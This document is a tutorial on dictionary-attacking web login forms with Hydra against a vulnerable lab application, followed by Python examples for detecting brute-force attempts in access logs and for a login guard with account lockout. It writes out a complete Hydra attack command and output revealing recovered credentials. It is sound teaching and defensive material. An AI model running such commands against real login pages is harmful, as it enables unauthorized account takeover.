Automated Brute Forcing on web-based login

Brute-force attacks work by generating every possible combination that could make up a password and testing each one to see if it is the correct password. As the password's length increases, the average time needed to find the correct password grows exponentially. This means short passwords can usually be discovered quite quickly, but longer passwords may take decades. [Source : Wiki]

It may still be feasible in some situations, as computer hardware keeps getting faster. A simple brute-force attack would start with one-character passwords, then two-character passwords, and so on, trying all possible combinations until one works.

A better idea is a “dictionary attack”, which tries words from a dictionary, or a list of common passwords, instead of every possible password. This can be very effective, as many people use such weak and common passwords.

We can use an automated tool to brute-force a web-based login form.

Using Hydra to dictionary-attack web-based login forms
Hydra is an online password-cracking tool for dictionary attacks. It tries lists of usernames and passwords until a successful login is found. It is multi-threaded and can try username/password combinations at a rate of thousands per minute. [Source

Hydra can be used to attack many different services, including IMAP, SMB, HTTP, VNC, MS-SQL, MySQL, SMTP, SSH and many more.

This tool should not be used to attack websites or services where you do not have permission to do so. Use this for legitimate testing purposes only.

An example attack
The Web Security Dojo has various vulnerable applications that you can use to test these techniques. As an example, the w3af testing framework has a test login at the following location:

http://192.168.1.69/w3af/bruteforce/form_login/

The important parts of the HTML form are:

<form name="input" action="dataReceptor.php" method="post">
  Username: <input type="text" name="user">
  Password: <input type="password" name="pass">
</form>

If we put in one wrong username and password combination we get:

Bad login, stop bruteforcing me!Bad u/p combination for user: a

We now have the information we need to attack this login form, and can use it to construct a Hydra brute-force attack as follows:

hydra 192.168.1.69 http-form-post "/w3af/bruteforce/form_login/dataReceptor.php:user=^USER^&pass=^PASS^:Bad login" -L users.txt -P pass.txt -t 10 -w 30 -o hydra-http-post-attack.txt

If we break this up:

Host = 192.168.1.69

Method = http-form-post

URL = /w3af/bruteforce/form_login/dataReceptor.php

Form parameters = user=^USER^&pass=^PASS^

Failure response = Bad login

Users file = users.txt

Password file = pass.txt

Threads = -t 10

Wait for timeout = -w 30

Output file = -o hydra-http-post-attack.txt

Hydra iterates through all the username/password combinations until it gets a response that does not contain the text “Bad login”. When we run this attack we get:

Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2011-08-22 13:11:03

[DATA] 5 tasks, 1 servers, 5 login tries (l:5/p:1), ~1 tries per task

[DATA] attacking service http-post-form on port 80

[STATUS] attack finished for 192.168.1.69 (waiting for children to finish)

[80][www-form] host: 192.168.1.69   login: admin   password: 1234

Hydra (http://www.thc.org/thc-hydra) finished at 2011-08-22 13:11:07

As you can see, this was successful and found the user "admin" with password "1234".
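Because this login handler answers every guess with HTTP 200 (the failure text is in the response body, not the status code), a defender cannot key detection on status; the usable signal is the request rate to the handler. The following Python is an added example, not part of the original post: it parses combined-format access-log lines and flags any source IP that POSTs to the login handler five or more times within 60 seconds. The log lines, IP addresses, threshold and window are constructed for the example and assume the log is in time order, as server logs are.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache/nginx "combined" access-log format; fields after the size are ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# The login handler from the article; every credential guess is one POST to it.
LOGIN_PATH = "/w3af/bruteforce/form_login/dataReceptor.php"

# Constructed sample log: one normal visitor (192.168.1.10) and one source
# (10.0.0.5) firing six POSTs within three seconds, plus a malformed line.
SAMPLE_LOG = """\
192.168.1.10 - - [22/Aug/2011:13:10:40 +0000] "GET /w3af/bruteforce/form_login/ HTTP/1.1" 200 412 "-" "Mozilla/5.0"
192.168.1.10 - - [22/Aug/2011:13:10:52 +0000] "POST /w3af/bruteforce/form_login/dataReceptor.php HTTP/1.1" 200 57 "-" "Mozilla/5.0"
10.0.0.5 - - [22/Aug/2011:13:11:03 +0000] "POST /w3af/bruteforce/form_login/dataReceptor.php HTTP/1.0" 200 57 "-" "Mozilla/5.0"
10.0.0.5 - - [22/Aug/2011:13:11:03 +0000] "POST /w3af/bruteforce/form_login/dataReceptor.php HTTP/1.0" 200 57 "-" "Mozilla/5.0"
10.0.0.5 - - [22/Aug/2011:13:11:04 +0000] "POST /w3af/bruteforce/form_login/dataReceptor.php HTTP/1.0" 200 57 "-" "Mozilla/5.0"
10.0.0.5 - - [22/Aug/2011:13:11:04 +0000] "POST /w3af/bruteforce/form_login/dataReceptor.php HTTP/1.0" 200 57 "-" "Mozilla/5.0"
10.0.0.5 - - [22/Aug/2011:13:11:05 +0000] "POST /w3af/bruteforce/form_login/dataReceptor.php HTTP/1.0" 200 57 "-" "Mozilla/5.0"
10.0.0.5 - - [22/Aug/2011:13:11:05 +0000] "POST /w3af/bruteforce/form_login/dataReceptor.php HTTP/1.0" 200 63 "-" "Mozilla/5.0"
this line is not in combined log format and is skipped
192.168.1.10 - - [22/Aug/2011:13:11:30 +0000] "POST /w3af/bruteforce/form_login/dataReceptor.php HTTP/1.1" 200 63 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "method": m["method"],
        "path": m["path"],
        "status": int(m["status"]),
    }


def detect_bruteforce(lines, path=LOGIN_PATH, threshold=5, window_seconds=60):
    """Return {ip: timestamp of first alert} for every source IP that POSTs
    to `path` at least `threshold` times inside a sliding `window_seconds` window."""
    recent = defaultdict(deque)  # ip -> timestamps of its recent login POSTs
    alerts = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] != path:
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        # Drop timestamps that have fallen out of the window (q is never empty here).
        while (rec["ts"] - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= threshold and rec["ip"] not in alerts:
            alerts[rec["ip"]] = rec["ts"]
    return alerts


def run_sample():
    """Run the detector over the constructed sample log."""
    return detect_bruteforce(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for ip, ts in run_sample().items():
        print(f"possible credential brute force from {ip}, first seen at {ts.isoformat()}")
```

The detector keeps one small deque per source IP, so it can run as a streaming tail on a live log; a real deployment would also fan out to the application's own authentication log, since distributed attacks spread guesses across many IPs and stay under a per-IP threshold.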

Prevention

  1. Implement an account lockout policy. For example, after three failed login attempts, the account is locked until an administrator unlocks it.
  2. Use a challenge-response test to prevent automated submission of the login form. Tools such as the free reCAPTCHA can require the user to enter a word or solve a simple math problem to confirm that the user is, in fact, a person.
  3. Any web application should enforce the use of strong passwords. At a minimum, requiring passwords of eight characters or more with some complexity (letters and numbers, or at least one special character) is an excellent defence against brute-force attacks.
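An added example, not from the original post, that implements the first and third points above in Python: a small login guard with a salted PBKDF2 password store, a lockout after three consecutive failures that only an administrator can clear, and the eight-character complexity rule. The class name, the return codes, the PBKDF2 iteration count and the sample account are my own choices for the example.

```python
import hashlib
import hmac
import os
import re

LOCKOUT_THRESHOLD = 3  # consecutive failures before the account is locked


def hash_password(password, salt=None, iterations=100_000):
    """Salted PBKDF2-HMAC-SHA256; returns (salt, digest)."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest


def meets_password_policy(password):
    """Eight or more characters, and either letters plus digits or at least one special character."""
    if len(password) < 8:
        return False
    has_letter = re.search(r"[A-Za-z]", password) is not None
    has_digit = re.search(r"\d", password) is not None
    has_special = re.search(r"[^A-Za-z0-9]", password) is not None
    return (has_letter and has_digit) or has_special


class LoginGuard:
    """In-memory user store with a lock-until-admin-unlocks policy (example only)."""

    def __init__(self, threshold=LOCKOUT_THRESHOLD):
        self.threshold = threshold
        self.users = {}     # username -> (salt, digest)
        self.failures = {}  # username -> consecutive failed attempts
        self.locked = set()

    def register(self, username, password):
        if not meets_password_policy(password):
            raise ValueError("password does not meet the complexity policy")
        self.users[username] = hash_password(password)

    def login(self, username, password):
        """Return 'ok', 'bad_credentials' or 'locked'."""
        if username in self.locked:
            return "locked"  # even the correct password is refused while locked
        record = self.users.get(username)
        if record is None:
            # Unknown user: do the same amount of hashing so response time
            # does not reveal which usernames exist, and do not count failures.
            hash_password(password, salt=b"\x00" * 16)
            return "bad_credentials"
        salt, digest = record
        if hmac.compare_digest(hash_password(password, salt)[1], digest):
            self.failures[username] = 0
            return "ok"
        self.failures[username] = self.failures.get(username, 0) + 1
        if self.failures[username] >= self.threshold:
            self.locked.add(username)
        return "bad_credentials"

    def admin_unlock(self, username):
        self.locked.discard(username)
        self.failures[username] = 0


if __name__ == "__main__":
    guard = LoginGuard()
    guard.register("admin", "correct-horse-7")  # constructed sample account
    for guess in ("1234", "password", "letmein", "correct-horse-7"):
        print(guess, "->", guard.login("admin", guess))
```

Locking until an administrator intervenes stops the dictionary run, but it also lets anyone who knows a username lock that account out, so many deployments prefer a temporary lock or a progressive delay instead; the unknown-user branch still runs a hash so the timing of the reply does not tell a caller which usernames are valid.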